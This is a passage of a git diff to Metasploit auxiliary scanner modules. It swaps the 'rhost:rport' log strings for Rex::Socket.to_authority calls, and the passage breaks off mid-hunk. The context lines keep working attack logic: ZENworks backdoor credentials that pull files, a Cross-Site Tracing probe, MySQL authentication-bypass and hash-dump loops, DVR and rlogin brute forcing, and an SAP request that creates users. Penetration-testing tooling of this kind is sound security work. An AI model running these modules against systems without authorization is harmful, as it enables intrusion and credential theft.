-        vprint_good("#{rhost}:#{rport} - Response - File #{file}:")
+        vprint_good("#{Rex::Socket.to_authority(rhost, rport)} - Response - File #{file}:")
         res.body.each_line do |line|
           # the following is the last line of the useless response
           if line.to_s =~ /\/\/--><\/SCRIPT>/
@@ -107,13 +107,13 @@ class MetasploitModule < Msf::Auxiliary
         out = false
       end
     elsif res && res.code
-      vprint_error("#{rhost}:#{rport} - File->#{file} not found")
+      vprint_error("#{Rex::Socket.to_authority(rhost, rport)} - File->#{file} not found")
     end
   end
 
   def run_host(ip)
     begin
-      vprint_status("#{rhost}:#{rport} - Fingerprinting...")
+      vprint_status("#{Rex::Socket.to_authority(rhost, rport)} - Fingerprinting...")
       res = send_request_cgi(
         {
           'method' => 'GET',
@@ -123,7 +123,7 @@ class MetasploitModule < Msf::Auxiliary
 
       return if (res.headers['Server'].nil? or res.headers['Server'] !~ /TP-LINK Router/)
     rescue ::Rex::ConnectionError
-      vprint_error("#{rhost}:#{rport} - Failed to connect to the web server")
+      vprint_error("#{Rex::Socket.to_authority(rhost, rport)} - Failed to connect to the web server")
       return
     end
 

--- a/modules/auxiliary/scanner/http/trace.rb
+++ b/modules/auxiliary/scanner/http/trace.rb
@@ -35,12 +35,12 @@ class MetasploitModule < Msf::Auxiliary
       })
 
       unless res
-        vprint_error("#{rhost}:#{rport} did not reply to our request")
+        vprint_error("#{Rex::Socket.to_authority(rhost, rport)} did not reply to our request")
         return
       end
 
       if res.body.to_s.index('/<script>alert(1337)</script>')
-        print_good("#{rhost}:#{rport} is vulnerable to Cross-Site Tracing")
+        print_good("#{Rex::Socket.to_authority(rhost, rport)} is vulnerable to Cross-Site Tracing")
         report_vuln(
           :host => rhost,
           :port => rport,
@@ -51,7 +51,7 @@ class MetasploitModule < Msf::Auxiliary
           :info => "Vulnerable to Cross-Site Tracing"
         )
       else
-        vprint_error("#{rhost}:#{rport} returned #{res.code} #{res.message}")
+        vprint_error("#{Rex::Socket.to_authority(rhost, rport)} returned #{res.code} #{res.message}")
       end
     rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
     rescue ::Timeout::Error, ::Errno::EPIPE

--- a/modules/auxiliary/scanner/http/zenworks_assetmanagement_fileaccess.rb
+++ b/modules/auxiliary/scanner/http/zenworks_assetmanagement_fileaccess.rb
@@ -67,7 +67,7 @@ class MetasploitModule < Msf::Auxiliary
     end
     post_data << "maintenance=GetFile_password&username=Ivanhoe&password=Scott&send=Submit"
 
-    print_status("#{rhost}:#{rport} - Sending request...")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Sending request...")
     res = send_request_cgi({
       'uri' => '/rtrlet/rtr',
       'method' => 'POST',
@@ -75,11 +75,11 @@ class MetasploitModule < Msf::Auxiliary
     }, 5)
 
     if res and res.code == 200 and res.body =~ /Last 100000000 kilobytes of/ and res.body =~ /File name/ and not res.body =~ /<br\/>File not found.<br\/>/
-      print_good("#{rhost}:#{rport} - File retrieved successfully!")
+      print_good("#{Rex::Socket.to_authority(rhost, rport)} - File retrieved successfully!")
       start_contents = res.body.index("<pre>") + 7
       end_contents = res.body.rindex("</pre>") - 1
       if start_contents.nil? or end_contents.nil?
-        print_error("#{rhost}:#{rport} - Error reading file contents")
+        print_error("#{Rex::Socket.to_authority(rhost, rport)} - Error reading file contents")
         return
       end
       contents = res.body[start_contents..end_contents]
@@ -91,9 +91,9 @@ class MetasploitModule < Msf::Auxiliary
         contents,
         fname
       )
-      print_status("#{rhost}:#{rport} - File saved in: #{path}")
+      print_status("#{Rex::Socket.to_authority(rhost, rport)} - File saved in: #{path}")
     else
-      print_error("#{rhost}:#{rport} - Failed to retrieve file")
+      print_error("#{Rex::Socket.to_authority(rhost, rport)} - Failed to retrieve file")
       return
     end
   end

--- a/modules/auxiliary/scanner/http/zenworks_assetmanagement_getconfig.rb
+++ b/modules/auxiliary/scanner/http/zenworks_assetmanagement_getconfig.rb
@@ -47,7 +47,7 @@ class MetasploitModule < Msf::Auxiliary
   def run_host(ip)
     post_data = "kb=&file=&absolute=&maintenance=GetConfigInfo_password&username=Ivanhoe&password=Scott&send=Submit"
 
-    print_status("#{rhost}:#{rport} - Sending request...")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Sending request...")
     res = send_request_cgi({
       'uri' => '/rtrlet/rtr',
       'method' => 'POST',
@@ -55,7 +55,7 @@ class MetasploitModule < Msf::Auxiliary
     }, 5)
 
     if res and res.code == 200 and res.body =~ /<b>Rtrlet Servlet Configuration Parameters \(live\)<\/b><br\/>/
-      print_good("#{rhost}:#{rport} - File retrieved successfully!")
+      print_good("#{Rex::Socket.to_authority(rhost, rport)} - File retrieved successfully!")
       path = store_loot(
         'novell.zenworks_asset_management.config',
         'text/html',
@@ -64,9 +64,9 @@ class MetasploitModule < Msf::Auxiliary
         nil,
         "Novell ZENworks Asset Management Configuration"
       )
-      print_status("#{rhost}:#{rport} - File saved in: #{path}")
+      print_status("#{Rex::Socket.to_authority(rhost, rport)} - File saved in: #{path}")
     else
-      print_error("#{rhost}:#{rport} - Failed to retrieve configuration")
+      print_error("#{Rex::Socket.to_authority(rhost, rport)} - Failed to retrieve configuration")
       return
     end
   end

--- a/modules/auxiliary/scanner/ipmi/ipmi_dumphashes.rb
+++ b/modules/auxiliary/scanner/ipmi/ipmi_dumphashes.rb
@@ -53,15 +53,15 @@ class MetasploitModule < Msf::Auxiliary
   end
 
   def ipmi_status(msg)
-    vprint_status("#{rhost}:#{rport} - IPMI - #{msg}")
+    vprint_status("#{Rex::Socket.to_authority(rhost, rport)} - IPMI - #{msg}")
   end
 
   def ipmi_error(msg)
-    vprint_error("#{rhost}:#{rport} - IPMI - #{msg}")
+    vprint_error("#{Rex::Socket.to_authority(rhost, rport)} - IPMI - #{msg}")
   end
 
   def ipmi_good(msg)
-    print_good("#{rhost}:#{rport} - IPMI - #{msg}")
+    print_good("#{Rex::Socket.to_authority(rhost, rport)} - IPMI - #{msg}")
   end
 
   def run_host(ip)

--- a/modules/auxiliary/scanner/misc/cctv_dvr_login.rb
+++ b/modules/auxiliary/scanner/misc/cctv_dvr_login.rb
@@ -70,10 +70,10 @@ class MetasploitModule < Msf::Auxiliary
     rescue ::Interrupt
       raise $!
     rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
-      print_error("Timeout or no connection on #{rhost}:#{rport}")
+      print_error("Timeout or no connection on #{Rex::Socket.to_authority(rhost, rport)}")
       return
     rescue ::Exception => e
-      print_error("#{rhost}:#{rport} Error: #{e.class} #{e} #{e.backtrace}")
+      print_error("#{Rex::Socket.to_authority(rhost, rport)} Error: #{e.class} #{e} #{e.backtrace}")
       return
     ensure
       disconnect
@@ -191,16 +191,16 @@ class MetasploitModule < Msf::Auxiliary
 
     # Analyze the response
     if res == "\x00\x01\x03\x01\x00\x00\x00\x00" # Failed Password
-      vprint_error("#{rhost}:#{rport}  Failed login as: '#{user}'")
+      vprint_error("#{Rex::Socket.to_authority(rhost, rport)}  Failed login as: '#{user}'")
       return
 
     elsif res == "\x00\x01\x02\x01\x00\x00\x00\x00" # Invalid User
-      vprint_error("#{rhost}:#{rport}  Invalid user: '#{user}'")
+      vprint_error("#{Rex::Socket.to_authority(rhost, rport)}  Invalid user: '#{user}'")
       # Stop attempting passwords for this user since it doesn't exist
       return :skip_user
 
     elsif res == "\x00\x01\x05\x01\x00\x00\x00\x00" or res == "\x00\x01\x01\x01\x00\x00\x00\x00"
-      print_good("#{rhost}:#{rport}  Successful login: '#{user}' : '#{pass}'")
+      print_good("#{Rex::Socket.to_authority(rhost, rport)}  Successful login: '#{user}' : '#{pass}'")
 
       # Report valid credentials under the CCTV DVR admin port (5920/TCP).
       # This is a proprietary protocol.
@@ -210,7 +210,7 @@ class MetasploitModule < Msf::Auxiliary
       return :next_user
 
     else
-      vprint_error("#{rhost}:#{rport}  Failed login as: '#{user}' - Unclassified Response: #{res.inspect}")
+      vprint_error("#{Rex::Socket.to_authority(rhost, rport)}  Failed login as: '#{user}' - Unclassified Response: #{res.inspect}")
       return
     end
   end

--- a/modules/auxiliary/scanner/misc/dvr_config_disclosure.rb
+++ b/modules/auxiliary/scanner/misc/dvr_config_disclosure.rb
@@ -241,12 +241,12 @@ class MetasploitModule < Msf::Auxiliary
     })
 
     if not res or res.code != 200 or res.body.empty? or res.body !~ /CAMERA/
-      vprint_error("#{rhost}:#{rport} - DVR configuration not found")
+      vprint_error("#{Rex::Socket.to_authority(rhost, rport)} - DVR configuration not found")
       return
     end
 
     p = store_loot("dvr.configuration", "text/plain", rhost, res.body, "DVR.cfg")
-    vprint_good("#{rhost}:#{rport} - DVR configuration stored in #{p}")
+    vprint_good("#{Rex::Socket.to_authority(rhost, rport)} - DVR configuration stored in #{p}")
 
     conf = res.body
 
@@ -261,6 +261,6 @@ class MetasploitModule < Msf::Auxiliary
     end
 
     report_service(:host => rhost, :port => rport, :sname => 'dvr', :info => "DVR NAME: #{dvr_name}")
-    print_good("#{rhost}:#{rport} DVR #{dvr_name} found")
+    print_good("#{Rex::Socket.to_authority(rhost, rport)} DVR #{dvr_name} found")
   end
 end

--- a/modules/auxiliary/scanner/misc/ibm_mq_channel_brute.rb
+++ b/modules/auxiliary/scanner/misc/ibm_mq_channel_brute.rb
@@ -118,7 +118,7 @@ class MetasploitModule < Msf::Auxiliary
 
           t << framework.threads.spawn("Module(#{self.refname})-#{rhost}:#{rport}", false, this_channel) do |channel|
             connect
-            vprint_status "#{rhost}:#{rport} - Sending request for #{channel}..."
+            vprint_status "#{Rex::Socket.to_authority(rhost, rport)} - Sending request for #{channel}..."
             if channel.length.to_i > 20
               print_error("Channel names cannot exceed 20 characters.  Skipping.")
               next

--- a/modules/auxiliary/scanner/misc/ibm_mq_login.rb
+++ b/modules/auxiliary/scanner/misc/ibm_mq_login.rb
@@ -240,7 +240,7 @@ class MetasploitModule < Msf::Auxiliary
 
           t << framework.threads.spawn("Module(#{self.refname})-#{rhost}:#{rport}", false, this_username) do |username|
             connect
-            vprint_status "#{rhost}:#{rport} - Sending request for #{username}..."
+            vprint_status "#{Rex::Socket.to_authority(rhost, rport)} - Sending request for #{username}..."
             channel = datastore['CHANNEL']
             if channel.length > 20
               print_error("Channel name must be less than 20 characters.")

--- a/modules/auxiliary/scanner/misc/java_jmx_server.rb
+++ b/modules/auxiliary/scanner/misc/java_jmx_server.rb
@@ -38,7 +38,7 @@ class MetasploitModule < Msf::Auxiliary
     connect
     print_status("Sending RMI header...")
     unless is_rmi?
-      print_status("#{rhost}:#{rport} Java JMX RMI not detected")
+      print_status("#{Rex::Socket.to_authority(rhost, rport)} Java JMX RMI not detected")
       disconnect
       return
     end
@@ -47,14 +47,14 @@ class MetasploitModule < Msf::Auxiliary
     disconnect
 
     if mbean_server.nil?
-      print_status("#{rhost}:#{rport} Java JMX MBean not detected")
+      print_status("#{Rex::Socket.to_authority(rhost, rport)} Java JMX MBean not detected")
       return
     end
 
     connect(true, { 'RHOST' => mbean_server[:address], 'RPORT' => mbean_server[:port] })
 
     unless is_rmi?
-      print_status("#{rhost}:#{rport} Java JMX RMI not detected")
+      print_status("#{Rex::Socket.to_authority(rhost, rport)} Java JMX RMI not detected")
       disconnect
       return
     end

--- a/modules/auxiliary/scanner/misc/java_rmi_server.rb
+++ b/modules/auxiliary/scanner/misc/java_rmi_server.rb
@@ -89,7 +89,7 @@ class MetasploitModule < Msf::Auxiliary
     end
 
     if return_value.is_exception? && loader_enabled?(return_value.value)
-      print_good("#{rhost}:#{rport} Java RMI Endpoint Detected: Class Loader Enabled")
+      print_good("#{Rex::Socket.to_authority(rhost, rport)} Java RMI Endpoint Detected: Class Loader Enabled")
       svc = report_service(:host => rhost, :port => rport, :name => "java-rmi", :info => "Class Loader: Enabled")
       report_vuln(
         :host => rhost,
@@ -100,7 +100,7 @@ class MetasploitModule < Msf::Auxiliary
       )
       Exploit::CheckCode::Vulnerable
     else
-      print_status("#{rhost}:#{rport} Java RMI Endpoint Detected: Class Loader Disabled")
+      print_status("#{Rex::Socket.to_authority(rhost, rport)} Java RMI Endpoint Detected: Class Loader Disabled")
       report_service(:host => rhost, :port => rport, :name => "java-rmi", :info => "Class Loader: Disabled")
       Exploit::CheckCode::Safe
     end

--- a/modules/auxiliary/scanner/misc/raysharp_dvr_passwords.rb
+++ b/modules/auxiliary/scanner/misc/raysharp_dvr_passwords.rb
@@ -127,6 +127,6 @@ class MetasploitModule < Msf::Auxiliary
     return unless (creds.keys.length > 0 or mac or ver)
 
     report_service(:host => rhost, :port => rport, :sname => 'dvr', :info => info)
-    print_good("#{rhost}:#{rport} #{info}")
+    print_good("#{Rex::Socket.to_authority(rhost, rport)} #{info}")
   end
 end

--- a/modules/auxiliary/scanner/mysql/mysql_authbypass_hashdump.rb
+++ b/modules/auxiliary/scanner/mysql/mysql_authbypass_hashdump.rb
@@ -68,14 +68,14 @@ class MetasploitModule < Msf::Auxiliary
 
       print_good "#{mysql_client.peerhost}:#{mysql_client.peerport} The server accepted our first login as #{username} with a bad password. URI: mysql://#{username}:#{password}@#{mysql_client.peerhost}:#{mysql_client.peerport}"
     rescue ::Rex::Proto::MySQL::Client::HostNotPrivileged
-      print_error "#{rhost}:#{rport} Unable to login from this host due to policy (may still be vulnerable)"
+      print_error "#{Rex::Socket.to_authority(rhost, rport)} Unable to login from this host due to policy (may still be vulnerable)"
       return
     rescue ::Rex::Proto::MySQL::Client::AccessDeniedError
-      print_good "#{rhost}:#{rport} The server allows logins, proceeding with bypass test"
+      print_good "#{Rex::Socket.to_authority(rhost, rport)} The server allows logins, proceeding with bypass test"
     rescue ::Interrupt
       raise $!
     rescue ::Exception => e
-      print_error "#{rhost}:#{rport} Error: #{e}"
+      print_error "#{Rex::Socket.to_authority(rhost, rport)} Error: #{e}"
       return
     ensure
       socket.close if socket && close_required
@@ -109,7 +109,7 @@ class MetasploitModule < Msf::Auxiliary
         break if not item
 
         # Status indicator
-        print_status "#{rhost}:#{rport} Authentication bypass is #{item / 10}% complete" if (item % 100) == 0
+        print_status "#{Rex::Socket.to_authority(rhost, rport)} Authentication bypass is #{item / 10}% complete" if (item % 100) == 0
 
         t = Thread.new(item) do |count|
           begin
@@ -118,12 +118,12 @@ class MetasploitModule < Msf::Auxiliary
             s = connect(false)
             mysql_client = ::Rex::Proto::MySQL::Client.connect(rhost, username, password, nil, rport, io: s)
 
-            print_good "#{mysql_client.peerhost}:#{mysql_client.peerport} Successfully bypassed authentication after #{count} attempts. URI: mysql://#{username}:#{password}@#{rhost}:#{rport}"
+            print_good "#{mysql_client.peerhost}:#{mysql_client.peerport} Successfully bypassed authentication after #{count} attempts. URI: mysql://#{username}:#{password}@#{Rex::Socket.to_authority(rhost, rport)}"
             results << mysql_client
             close_required = false
           rescue ::Rex::Proto::MySQL::Client::AccessDeniedError
           rescue ::Exception => e
-            print_bad "#{rhost}:#{rport} Thread #{count}] caught an unhandled exception: #{e}"
+            print_bad "#{Rex::Socket.to_authority(rhost, rport)} Thread #{count}] caught an unhandled exception: #{e}"
           ensure
             s.close if socket && close_required
           end
@@ -158,7 +158,7 @@ class MetasploitModule < Msf::Auxiliary
       return dump_hashes(mysql_client.peerhost, mysql_client.peerport)
     end
 
-    print_error("#{rhost}:#{rport} Unable to bypass authentication, this target may not be vulnerable")
+    print_error("#{Rex::Socket.to_authority(rhost, rport)} Unable to bypass authentication, this target may not be vulnerable")
   end
 
   def dump_hashes(host, port)

--- a/modules/auxiliary/scanner/mysql/mysql_login.rb
+++ b/modules/auxiliary/scanner/mysql/mysql_login.rb
@@ -164,7 +164,7 @@ class MetasploitModule < Msf::Auxiliary
     rescue ::Rex::ConnectionError, ::EOFError => e
       raise e
     rescue ::Exception => e
-      vprint_error("#{rhost}:#{rport} error checking version #{e.class} #{e}")
+      vprint_error("#{Rex::Socket.to_authority(rhost, rport)} error checking version #{e.class} #{e}")
       return false
     end
     offset = 0
@@ -184,7 +184,7 @@ class MetasploitModule < Msf::Auxiliary
     version = data[offset..-1].unpack('Z*')[0]
     report_service(:host => rhost, :port => rport, :name => "mysql", :info => version)
     short_version = version.split('-')[0]
-    vprint_good "#{rhost}:#{rport} - Found remote MySQL version #{short_version}"
+    vprint_good "#{Rex::Socket.to_authority(rhost, rport)} - Found remote MySQL version #{short_version}"
     int_version(short_version) >= int_version(target)
   end
 

--- a/modules/auxiliary/scanner/mysql/mysql_version.rb
+++ b/modules/auxiliary/scanner/mysql/mysql_version.rb
@@ -45,11 +45,11 @@ class MetasploitModule < Msf::Auxiliary
       end
 
       if data.nil?
-        print_error "The connection to #{rhost}:#{rport} timed out"
+        print_error "The connection to #{Rex::Socket.to_authority(rhost, rport)} timed out"
         return
       end
     rescue ::Rex::ConnectionError, ::EOFError
-      vprint_error("#{rhost}:#{rport} - Connection failed")
+      vprint_error("#{Rex::Socket.to_authority(rhost, rport)} - Connection failed")
       return
     rescue ::Exception
       print_error("Error: #{$!}")
@@ -72,7 +72,7 @@ class MetasploitModule < Msf::Auxiliary
     if proto == 255
       offset += 2
       err_msg = Rex::Text.to_hex_ascii(data[offset..-1].to_s)
-      print_status("#{rhost}:#{rport} is running MySQL, but responds with an error: #{err_msg}")
+      print_status("#{Rex::Socket.to_authority(rhost, rport)} is running MySQL, but responds with an error: #{err_msg}")
       report_service(
         :host => rhost,
         :port => rport,
@@ -82,7 +82,7 @@ class MetasploitModule < Msf::Auxiliary
     else
       offset += 1
       version = data[offset..-1].unpack('Z*')[0]
-      print_good("#{rhost}:#{rport} is running MySQL #{version} (protocol #{proto})")
+      print_good("#{Rex::Socket.to_authority(rhost, rport)} is running MySQL #{version} (protocol #{proto})")
       report_service(
         :host => rhost,
         :port => rport,

--- a/modules/auxiliary/scanner/ntp/ntp_nak_to_the_future.rb
+++ b/modules/auxiliary/scanner/ntp/ntp_nak_to_the_future.rb
@@ -80,7 +80,7 @@ class MetasploitModule < Msf::Auxiliary
     if response.length == expected_length
       ntp_symmetric = Rex::Proto::NTP::Header::NTPHeader.read(response)
       if ntp_symmetric.mode == SYMMETRIC_PASSIVE_MODE && ntp_symmetric.origin_timestamp == nil
-        vprint_good("#{rhost}:#{rport} - NTP - VULNERABLE: Accepted a NTP symmetric active association")
+        vprint_good("#{Rex::Socket.to_authority(rhost, rport)} - NTP - VULNERABLE: Accepted a NTP symmetric active association")
         report_vuln(
           host: rhost,
           port: rport.to_i,

--- a/modules/auxiliary/scanner/oracle/spy_sid.rb
+++ b/modules/auxiliary/scanner/oracle/spy_sid.rb
@@ -48,7 +48,7 @@ class MetasploitModule < Msf::Auxiliary
           :data	=> { :sid => sid.uniq.to_s },
           :update	=> :unique_data
         )
-        print_good("#{rhost}:#{rport} Discovered SID: '#{sid.uniq}'")
+        print_good("#{Rex::Socket.to_authority(rhost, rport)} Discovered SID: '#{sid.uniq}'")
       else
         print_error("Unable to retrieve SID for #{ip}...")
       end

--- a/modules/auxiliary/scanner/pcanywhere/pcanywhere_tcp.rb
+++ b/modules/auxiliary/scanner/pcanywhere/pcanywhere_tcp.rb
@@ -46,10 +46,10 @@ class MetasploitModule < Msf::Auxiliary
 =end
 
       report_service(:host => rhost, :port => rport, :name => "pcanywhere_data", :info => "")
-      print_good("#{rhost}:#{rport} pcAnywhere data service")
+      print_good("#{Rex::Socket.to_authority(rhost, rport)} pcAnywhere data service")
     rescue ::Rex::ConnectionError, ::EOFError, ::Errno::ECONNRESET
     rescue ::Exception => e
-      print_error("#{rhost}:#{rport} Error: #{e.class} #{e} #{e.backtrace}")
+      print_error("#{Rex::Socket.to_authority(rhost, rport)} Error: #{e.class} #{e} #{e.backtrace}")
     end
   end
 end

--- a/modules/auxiliary/scanner/postgres/postgres_dbname_flag_injection.rb
+++ b/modules/auxiliary/scanner/postgres/postgres_dbname_flag_injection.rb
@@ -57,7 +57,7 @@ class MetasploitModule < Msf::Auxiliary
     if resp.to_s =~ /process_postgres_switches/
       proof = resp[4, resp.length - 4].to_s.gsub("\x00", " ")
 
-      print_good("#{rhost}:#{rport} is vulnerable to CVE-2013-1899: #{proof}")
+      print_good("#{Rex::Socket.to_authority(rhost, rport)} is vulnerable to CVE-2013-1899: #{proof}")
       report_vuln({
         :host	=> rhost,
         :port	=> rport,
@@ -68,9 +68,9 @@ class MetasploitModule < Msf::Auxiliary
         :refs => self.references
       })
     elsif resp.to_s =~ /pg_hba\.conf/
-      print_error("#{rhost}:#{rport} does not allow connections from us")
+      print_error("#{Rex::Socket.to_authority(rhost, rport)} does not allow connections from us")
     else
-      print_status("#{rhost}:#{rport} does not appear to be vulnerable to CVE-2013-1899")
+      print_status("#{Rex::Socket.to_authority(rhost, rport)} does not appear to be vulnerable to CVE-2013-1899")
     end
   end
 end

--- a/modules/auxiliary/scanner/postgres/postgres_schemadump.rb
+++ b/modules/auxiliary/scanner/postgres/postgres_schemadump.rb
@@ -68,7 +68,7 @@ class MetasploitModule < Msf::Auxiliary
     pg_schema = []
     database_names = session ? [session.client.params['database']] : smart_query('SELECT datname FROM pg_database').to_a.flatten
     if database_names.empty?
-      print_status("#{rhost}:#{rport} - No databases found")
+      print_status("#{Rex::Socket.to_authority(rhost, rport)} - No databases found")
       return pg_schema
     end
     status_message = "#{rhost}:#{rport} - Found databases: #{database_names.join(', ')}."
@@ -118,9 +118,9 @@ class MetasploitModule < Msf::Auxiliary
     when :sql_error
       case res[:sql_error]
       when /^C42501/
-        print_error "#{rhost}:#{rport} Postgres - Insufficient permissions."
+        print_error "#{Rex::Socket.to_authority(rhost, rport)} Postgres - Insufficient permissions."
       else
-        print_error "#{rhost}:#{rport} Postgres - #{res[:sql_error]}"
+        print_error "#{Rex::Socket.to_authority(rhost, rport)} Postgres - #{res[:sql_error]}"
       end
       return nil
     when :complete

--- a/modules/auxiliary/scanner/postgres/postgres_version.rb
+++ b/modules/auxiliary/scanner/postgres/postgres_version.rb
@@ -85,20 +85,20 @@ class MetasploitModule < Msf::Auxiliary
     begin
       msg = "#{rhost}:#{rport} Postgres -"
       password = pass || postgres_password
-      vprint_status("#{msg} Trying username:'#{user}' with password:'#{password}' against #{rhost}:#{rport} on database '#{database}'") unless postgres_conn
+      vprint_status("#{msg} Trying username:'#{user}' with password:'#{password}' against #{Rex::Socket.to_authority(rhost, rport)} on database '#{database}'") unless postgres_conn
       result = postgres_fingerprint(
         :db => database,
         :username => user,
         :password => password
       )
       if result[:auth]
-        vprint_good "#{rhost}:#{rport} Postgres - Logged in to '#{database}' with '#{user}':'#{password}'" unless session
-        print_status "#{rhost}:#{rport} Postgres - Version #{result[:auth]} (Post-Auth)"
+        vprint_good "#{Rex::Socket.to_authority(rhost, rport)} Postgres - Logged in to '#{database}' with '#{user}':'#{password}'" unless session
+        print_status "#{Rex::Socket.to_authority(rhost, rport)} Postgres - Version #{result[:auth]} (Post-Auth)"
       elsif result[:preauth]
-        print_good "#{rhost}:#{rport} Postgres - Version #{result[:preauth]} (Pre-Auth)"
+        print_good "#{Rex::Socket.to_authority(rhost, rport)} Postgres - Version #{result[:preauth]} (Pre-Auth)"
       else # It's something we don't know yet
-        vprint_status "#{rhost}:#{rport} Postgres - Authentication Error Fingerprint: #{result[:unknown]}"
-        print_status "#{rhost}:#{rport} Postgres - Version Unknown (Pre-Auth)"
+        vprint_status "#{Rex::Socket.to_authority(rhost, rport)} Postgres - Authentication Error Fingerprint: #{result[:unknown]}"
+        print_status "#{Rex::Socket.to_authority(rhost, rport)} Postgres - Version Unknown (Pre-Auth)"
       end
 
       # Reporting
@@ -134,7 +134,7 @@ class MetasploitModule < Msf::Auxiliary
       # Logout
       postgres_logout if self.postgres_conn && session.blank?
     rescue Rex::ConnectionError
-      vprint_error "#{rhost}:#{rport} Connection Error: #{$!}"
+      vprint_error "#{Rex::Socket.to_authority(rhost, rport)} Connection Error: #{$!}"
       return :done
     end
   end

--- a/modules/auxiliary/scanner/printer/printer_upload_file.rb
+++ b/modules/auxiliary/scanner/printer/printer_upload_file.rb
@@ -59,7 +59,7 @@ class MetasploitModule < Msf::Auxiliary
     pjl.fsinit(rpath[0..1])
 
     if pjl.fsdownload(lpath, rpath)
-      print_good("#{rhost}:#{rport} - Saved #{lpath} to #{rpath}")
+      print_good("#{Rex::Socket.to_authority(rhost, rport)} - Saved #{lpath} to #{rpath}")
     end
 
     pjl.end_job

--- a/modules/auxiliary/scanner/rservices/rlogin_login.rb
+++ b/modules/auxiliary/scanner/rservices/rlogin_login.rb
@@ -152,7 +152,7 @@ class MetasploitModule < Msf::Auxiliary
   def try_user_pass(user, luser, pass, status = nil)
     luser ||= 'root'
 
-    vprint_status "#{rhost}:#{rport} rlogin - Attempting: '#{user}':#{pass.inspect} from '#{luser}'"
+    vprint_status "#{Rex::Socket.to_authority(rhost, rport)} rlogin - Attempting: '#{user}':#{pass.inspect} from '#{luser}'"
 
     this_attempt ||= 0
     ret = nil
@@ -160,7 +160,7 @@ class MetasploitModule < Msf::Auxiliary
       if this_attempt > 0
         # power of 2 back-off
         select(nil, nil, nil, 2**this_attempt)
-        vprint_error "#{rhost}:#{rport} rlogin - Retrying '#{user}':#{pass.inspect} from '#{luser}' due to reset"
+        vprint_error "#{Rex::Socket.to_authority(rhost, rport)} rlogin - Retrying '#{user}':#{pass.inspect} from '#{luser}' due to reset"
       end
       ret = do_login(user, pass, luser, status)
       this_attempt += 1
@@ -168,17 +168,17 @@ class MetasploitModule < Msf::Auxiliary
 
     case ret
     when :no_pass_prompt
-      vprint_status "#{rhost}:#{rport} rlogin - Skipping '#{user}' due to missing password prompt"
+      vprint_status "#{Rex::Socket.to_authority(rhost, rport)} rlogin - Skipping '#{user}' due to missing password prompt"
       return :skip_user
 
     when :busy
-      vprint_error "#{rhost}:#{rport} rlogin - Skipping '#{user}':#{pass.inspect} from '#{luser}' due to busy state"
+      vprint_error "#{Rex::Socket.to_authority(rhost, rport)} rlogin - Skipping '#{user}':#{pass.inspect} from '#{luser}' due to busy state"
 
     when :refused
-      vprint_error "#{rhost}:#{rport} rlogin - Skipping '#{user}':#{pass.inspect} from '#{luser}' due to connection refused."
+      vprint_error "#{Rex::Socket.to_authority(rhost, rport)} rlogin - Skipping '#{user}':#{pass.inspect} from '#{luser}' due to connection refused."
 
     when :skip_user
-      vprint_status "#{rhost}:#{rport} rlogin - Skipping disallowed user '#{user}' for subsequent requests"
+      vprint_status "#{Rex::Socket.to_authority(rhost, rport)} rlogin - Skipping disallowed user '#{user}' for subsequent requests"
       return :skip_user
 
     when :success
@@ -256,7 +256,7 @@ class MetasploitModule < Msf::Auxiliary
       recv(self.sock, 0.10) unless @recvd.nil? || password_prompt?(@recvd)
     end
 
-    vprint_status("#{rhost}:#{rport} Prompt: #{@recvd.gsub(/[\r\n\e\b\a]/, ' ')}")
+    vprint_status("#{Rex::Socket.to_authority(rhost, rport)} Prompt: #{@recvd.gsub(/[\r\n\e\b\a]/, ' ')}")
 
     # Not successful yet, maybe we got a password prompt.
     if password_prompt?(user)
@@ -268,7 +268,7 @@ class MetasploitModule < Msf::Auxiliary
         break if login_succeeded?
       end
 
-      vprint_status("#{rhost}:#{rport} Result: #{@recvd.gsub(/[\r\n\e\b\a]/, ' ')}")
+      vprint_status("#{Rex::Socket.to_authority(rhost, rport)} Result: #{@recvd.gsub(/[\r\n\e\b\a]/, ' ')}")
 
       if login_succeeded?
         print_good("#{target_host}:#{rport}, rlogin '#{user}' successful with password #{pass.inspect}")

--- a/modules/auxiliary/scanner/rservices/rsh_login.rb
+++ b/modules/auxiliary/scanner/rservices/rsh_login.rb
@@ -129,7 +129,7 @@ class MetasploitModule < Msf::Auxiliary
       if this_attempt > 0
         # power of 2 back-off
         select(nil, nil, nil, 2**this_attempt)
-        vprint_error "#{rhost}:#{rport} rsh - Retrying '#{user}' from '#{luser}' due to reset"
+        vprint_error "#{Rex::Socket.to_authority(rhost, rport)} rsh - Retrying '#{user}' from '#{luser}' due to reset"
       end
       ret = connect_from_privileged_port
       break if ret == :connected

--- a/modules/auxiliary/scanner/sap/sap_ctc_verb_tampering_user_mgmt.rb
+++ b/modules/auxiliary/scanner/sap/sap_ctc_verb_tampering_user_mgmt.rb
@@ -59,19 +59,19 @@ class MetasploitModule < Msf::Auxiliary
   end
 
   def run_host(_ip)
-    vprint_status("#{rhost}:#{rport} - Creating User...")
+    vprint_status("#{Rex::Socket.to_authority(rhost, rport)} - Creating User...")
     uri = '/ctc/ConfigServlet?param=com.sap.ctc.util.UserConfig;CREATEUSER;USERNAME=' + datastore['USERNAME'] + ',PASSWORD=' + datastore['PASSWORD']
     if send_request(uri)
-      print_good("#{rhost}:#{rport} - User #{datastore['USERNAME']} with password #{datastore['PASSWORD']} successfully created")
+      print_good("#{Rex::Socket.to_authority(rhost, rport)} - User #{datastore['USERNAME']} with password #{datastore['PASSWORD']} successfully created")
     else
       return
     end
 
-    vprint_status("#{rhost}:#{rport} - Adding User to Group...")
+    vprint_status("#{Rex::Socket.to_authority(rhost, rport)} - Adding User to Group...")
     uri = '/ctc/ConfigServlet?param=com.sap.ctc.util.UserConfig;ADD_USER_TO_GROUP;USERNAME=' + datastore['USERNAME'] + ',GROUPNAME=' + datastore['GROUP']
     res = send_request(uri)
     if res
-      print_good("#{rhost}:#{rport} - User #{datastore['USERNAME']} added to group #{datastore['GROUP']}")
+      print_good("#{Rex::Socket.to_authority(rhost, rport)} - User #{datastore['USERNAME']} added to group #{datastore['GROUP']}")
     else
       return
     end
@@ -122,11 +122,11 @@ class MetasploitModule < Msf::Auxiliary
     if res && (res.code == 200) && res.headers['Server'] =~ /SAP J2EE Engine/
       return true
     elsif res
-      vprint_error("#{rhost}:#{rport} - Unexpected Response: #{res.code} #{res.message}")
